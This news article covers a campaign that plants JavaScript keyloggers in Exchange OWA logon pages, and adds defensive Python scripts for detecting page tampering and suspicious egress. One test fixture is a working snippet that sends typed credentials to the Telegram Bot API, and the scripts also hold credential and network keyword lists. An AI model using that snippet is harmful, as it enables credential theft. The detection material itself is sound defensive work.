Hackers Breach 70+ Microsoft Exchange Servers: Outlook Login Pages Infected


Hackers are exploiting vulnerable Microsoft Exchange servers with stealthy keyloggers to steal login credentials, compromising over 70 systems in at least 26 countries.

Cybersecurity researchers from Positive Technologies have discovered an ongoing wave of attacks targeting publicly exposed Microsoft Exchange servers. These servers are being infected with malicious JavaScript-based keyloggers that capture usernames and passwords when users log into Microsoft Outlook Web Access (OWA).

This new research builds upon a campaign first identified in May 2024, which initially focused on organizations in Africa and the Middle East. The number of confirmed victims has now grown to at least 65 organizations, with more than 70 Exchange servers compromised globally.

According to the report, hackers are exploiting known vulnerabilities in Microsoft Exchange Server to inject JavaScript code directly into the Outlook login page. The purpose of this code is to act as a keylogger — software that secretly records what users type into a form.

Positive Technologies identified two main variants of the JavaScript keyloggers:

  1. Local File-Based Keylogger: This version captures the user’s login data and stores it in a file on the infected server. That file can then be accessed remotely by the attacker.

  2. Remote Exfiltration via Telegram: This version sends the stolen data in real time to a Telegram bot over HTTP requests, with the credentials carried in the request headers.

Some variants also collect extra details such as browser cookies, User-Agent information, and timestamps. These additional data points help attackers mimic real user behavior and avoid detection.

The attackers are taking advantage of several well-known security flaws in Microsoft Exchange and Windows Server, including:

  • CVE-2014-4078 – IIS Security Feature Bypass

  • CVE-2020-0796 – SMBv3 Remote Code Execution (SMBGhost)

  • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 – ProxyLogon Exploits

  • CVE-2021-31206 – Exchange Server Remote Code Execution

  • CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 – ProxyShell Exploit Chain

Microsoft patched every one of these flaws years ago; the campaign succeeds only because many organizations still run unpatched Exchange servers directly exposed to the internet.

One of the reasons this campaign is particularly dangerous is its stealthy nature. In the local file version, the stolen credentials are written to a file on the server itself, so capture generates no outbound traffic for network monitoring to catch, and the JavaScript runs inside the genuine logon page, delivered over the organization's own HTTPS certificate, so users see nothing unusual. Detection therefore has to happen on the server: file integrity monitoring of the OWA authentication files (logon.aspx lives under %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\) against a known-good baseline, and review of IIS logs for requests that fetch an unexpected file from the OWA path, which is how the attacker collects the harvested credentials.
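The following Python script is an added example, not code from the Positive Technologies report or from the campaign: it compares an OWA logon page against a known-good baseline, lists every script element that is new, and flags the ones that read login fields and make network calls, or that add a server-side block. The two HTML documents, the indicator lists and the script-host allowlist are all constructed for this example; a real baseline would come from a clean server of the same Exchange build.

```python
"""Heuristic integrity check for an OWA logon page (logon.aspx).

Added example for this article; it is not Positive Technologies' tooling and
not code recovered from the campaign. BASELINE_HTML is a constructed, heavily
simplified stand-in for a known-good logon page; INFECTED_HTML is the same page
with two constructed injected blocks modelled on the two variants the article
describes. Indicator strings and the allowlist are assumptions.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the genuine page only loads script via relative URLs (netloc "").
ALLOWED_SCRIPT_HOSTS = {""}

# Tokens whose appearance in a script that is NOT in the baseline deserves a look.
CREDENTIAL_TOKENS = ("password", "passwd", "pwd", "username", "document.cookie", "navigator.useragent")
NETWORK_TOKENS = ("xmlhttprequest", "fetch(", "sendbeacon", "new image", "websocket", "telegram")

BASELINE_HTML = """<html><head><title>Outlook</title>
<script src="/owa/auth/15.1.2507/scripts/premium/flogon.js"></script></head>
<body><form id="logonForm" action="/owa/auth.owa" method="post">
<input id="username" name="username" type="text">
<input id="password" name="password" type="password">
<input type="submit" value="sign in"></form>
<script>function clkLgn() { document.getElementById("logonForm").submit(); }</script>
</body></html>"""

# Constructed injections: a new server-side block (local file variant) and a
# client-side hook that ships the typed credentials to a Telegram bot (remote variant).
INJECTED = """<script runat="server">// constructed placeholder for an attacker-added server-side handler</script>
<script>document.getElementById("logonForm").addEventListener("submit", function () {
  var u = document.getElementById("username").value, p = document.getElementById("password").value;
  var x = new XMLHttpRequest();
  x.open("GET", "https://api.telegram.org/bot<token>/sendMessage?chat_id=0&text=" + btoa(u + ":" + p));
  x.send(); });</script>"""
INFECTED_HTML = BASELINE_HTML.replace("</body>", INJECTED + "</body>")


class _ScriptCollector(HTMLParser):
    """Collects every <script> element: src, runat attribute and inline body."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src") or "", "runat": (a.get("runat") or "").lower(), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def extract_scripts(html):
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def _fingerprint(script):
    """Whitespace-insensitive identity of a script, so reformatting alone is not an alert."""
    body = re.sub(r"\s+", "", script["body"])
    return hashlib.sha256(f"{script['src']}|{script['runat']}|{body}".encode()).hexdigest()


def audit_logon_page(observed_html, baseline_html):
    """Return (reason, detail) findings for script elements in observed_html that are absent from baseline_html."""
    findings = []
    if hashlib.sha256(observed_html.encode()).hexdigest() != hashlib.sha256(baseline_html.encode()).hexdigest():
        findings.append(("page content differs from baseline", "re-check against a known-good copy of this build"))
    known = {_fingerprint(s) for s in extract_scripts(baseline_html)}
    for s in extract_scripts(observed_html):
        if _fingerprint(s) in known:
            continue
        low = s["body"].lower()
        creds = [t for t in CREDENTIAL_TOKENS if t in low]
        net = [t for t in NETWORK_TOKENS if t in low]
        reasons = []
        if s["src"] and urlparse(s["src"]).netloc.lower() not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("script loaded from a host outside the allowlist")
        if s["runat"] == "server":
            reasons.append("new server-side script block (runs on the Exchange server, can write files)")
        if creds and net:
            reasons.append("new inline script reads login fields and makes a network call")
        elif creds or net:
            reasons.append("new inline script touches login fields or the network")
        if not reasons:
            reasons.append("script not present in baseline")
        detail = s["src"] or " ".join(s["body"].split())[:80]
        findings.extend((r, detail) for r in reasons)
    return findings
```

Run it against logon.aspx pulled from the server's OWA auth directory and a clean copy of the same file. A hash mismatch on its own is only a prompt to look; a new inline script that both touches the password field and calls XMLHttpRequest or fetch is the pattern the article describes, and a new runat="server" block is what the local file variant needs in order to write credentials to disk.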

In the Telegram-based version, the credentials are encoded and sent to Telegram's Bot API (api.telegram.org) in GET requests, so the exfiltration looks like ordinary HTTPS web traffic and the attacker receives stolen usernames and passwords instantly. The weak point for defenders to exploit is the destination: an Exchange server has no legitimate reason to contact api.telegram.org, so egress allowlisting, or simply alerting on that host from server subnets, catches this variant.

Some attacks also involve DNS tunneling combined with HTTPS POST requests, which allow hackers to bypass traditional firewalls and security tools by blending in with normal DNS or HTTPS traffic.
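As an added example (not the researchers' tooling), the Python below triages egress logs for the network-side behaviours described above: requests from Exchange servers to the Telegram Bot API, with the bot token, chat ID and decoded payload pulled out; any other outbound host not on an allowlist; and a small entropy check over DNS query names as one way to spot tunnelled data. The log format, the allowlist, the thresholds and the assumption that the payload is base64 are this example's own; the article says only that the credentials are encoded and sent via GET.

```python
"""Egress-log triage for the exfiltration paths described in the article.

Added example, not Positive Technologies' code. SAMPLE_LOG is constructed in a
generic "time src method url status" proxy format; adapt parse_line() to your
proxy. The bot-token pattern, the allowlist, the DNS thresholds and the base64
decoding of the text parameter are assumptions.
"""
import base64
import binascii
import math
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed sample: 10.0.0.5 and 10.0.0.6 are Exchange servers, 10.0.0.21 a workstation.
SAMPLE_LOG = """\
2025-06-24T09:14:02Z 10.0.0.5 GET https://api.telegram.org/bot1234567890:AAFakeTokenForTheExample_0123456789/sendMessage?chat_id=-100123&text=amRvZTpTdW1tZXIyMDI1IQ%3D%3D 200
2025-06-24T09:14:05Z 10.0.0.5 GET http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 200
2025-06-24T09:15:11Z 10.0.0.21 GET https://web.telegram.org/ 200
2025-06-24T09:16:40Z 10.0.0.6 POST https://cdn.example-update.net/ping 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|CONNECT) (\S+) (\d{3})$")
# Telegram bot tokens look like <numeric id>:<secret>; the length bound is deliberately loose.
BOT_TOKEN_RE = re.compile(r"/bot(\d+:[A-Za-z0-9_-]{30,})/(\w+)")
# Assumption: the only internet hosts an Exchange server should reach on its own.
EGRESS_ALLOWLIST = {"ctldl.windowsupdate.com"}


def parse_line(line):
    """Split one constructed-format log line into fields; None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, url, status = m.groups()
    u = urlparse(url)
    return {"ts": ts, "src": src, "method": method, "host": u.netloc.lower(),
            "path": u.path, "query": u.query, "status": int(status)}


def decode_text_param(query):
    """Best-effort recovery of the exfiltrated payload from the Bot API 'text' parameter.

    parse_qs already URL-decodes; base64 is then tried because that is the encoding
    this example assumes. If the value is not valid base64 the raw string is returned.
    """
    vals = parse_qs(query).get("text")
    if not vals:
        return None
    raw = vals[0]
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return raw


def triage(log_text, exchange_hosts):
    """Return findings for outbound requests made by the given Exchange servers."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["src"] not in exchange_hosts:
            continue  # only egress originating from Exchange servers is in scope
        if rec["host"] == "api.telegram.org":
            m = BOT_TOKEN_RE.search(rec["path"])
            findings.append({
                "src": rec["src"], "severity": "high",
                "reason": "Exchange server calling Telegram Bot API",
                "bot_token": m.group(1) if m else None,
                "api_method": m.group(2) if m else None,
                "chat_id": parse_qs(rec["query"]).get("chat_id", [None])[0],
                "payload": decode_text_param(rec["query"]),
            })
        elif rec["host"] not in EGRESS_ALLOWLIST:
            findings.append({"src": rec["src"], "severity": "medium",
                             "reason": "egress to host outside allowlist", "host": rec["host"]})
    return findings


def dns_label_entropy(label):
    """Shannon entropy (bits per character) of a DNS label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_dns_queries(qnames, min_label_len=32, min_entropy=3.5):
    """Flag query names whose leftmost label is long and high-entropy, the crude
    signature of data being carried out in DNS queries. Thresholds are assumptions."""
    return [q for q in qnames
            if len(q.split(".")[0]) >= min_label_len
            and dns_label_entropy(q.split(".")[0]) >= min_entropy]


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, {"10.0.0.5", "10.0.0.6"}):
        print(f)
    print(suspicious_dns_queries(["autodiscover.contoso.com",
                                  "7f3a0c9e2b5d1846d2048f6a1e7c3b95e5b19d3c7f0a2846.t.example-c2.net"]))
```

The bot token recovered from the URL is itself useful: with it an incident responder can identify the attacker's bot and the chat the credentials were posted to, and it makes a precise indicator for the rest of the fleet. The DNS check deliberately ignores the second-level domain, since tunnelling works through any domain the attacker controls; what gives it away is the volume of long, random-looking labels.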

So far, 22 of the compromised servers were found in government organizations. Others include:

  • IT service providers

  • Educational institutions

  • Industrial and manufacturing companies

  • Logistics and supply chain firms

The top targeted countries include:

  • Vietnam

  • Russia

  • Taiwan

  • China

  • Pakistan

  • Lebanon

  • Australia

  • Zambia

  • The Netherlands

  • Turkey

Researchers suspect that the attackers are selectively choosing victims based on geography and industry, possibly for espionage or financial gain.


The continued success of these attacks highlights a critical issue in enterprise cybersecurity — many Microsoft Exchange servers around the world are still unpatched and exposed to the internet.

“By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext,” the researchers said.

This type of attack is not only dangerous but also difficult to detect and remediate, especially since the malicious code resides in trusted web applications that administrators and users rely on daily.

To protect against these kinds of attacks, organizations should:

  • Immediately patch known Exchange vulnerabilities, especially ProxyLogon and ProxyShell.

  • Remove public access to Exchange login pages wherever possible, for example by placing OWA behind a VPN or an authenticating reverse proxy.

  • Monitor the OWA logon page (logon.aspx) and the other files in the OWA authentication directory for unauthorized modifications, comparing them against a known-good copy from the same Exchange build.

  • Enable multi-factor authentication (MFA) to reduce the impact of credential theft.

  • Conduct regular security audits of web-facing systems, and review IIS and proxy logs for unexpected file retrievals and unexplained outbound connections from Exchange servers.

These keylogger attacks on Microsoft Exchange servers are a wake-up call for organizations still running legacy or unpatched infrastructure. With attackers increasingly embedding malicious code into trusted systems, traditional defenses like firewalls and antivirus are no longer enough.

Cybersecurity hygiene, patch management, and proactive threat detection are now more essential than ever to defend against stealthy, persistent threats like this one.

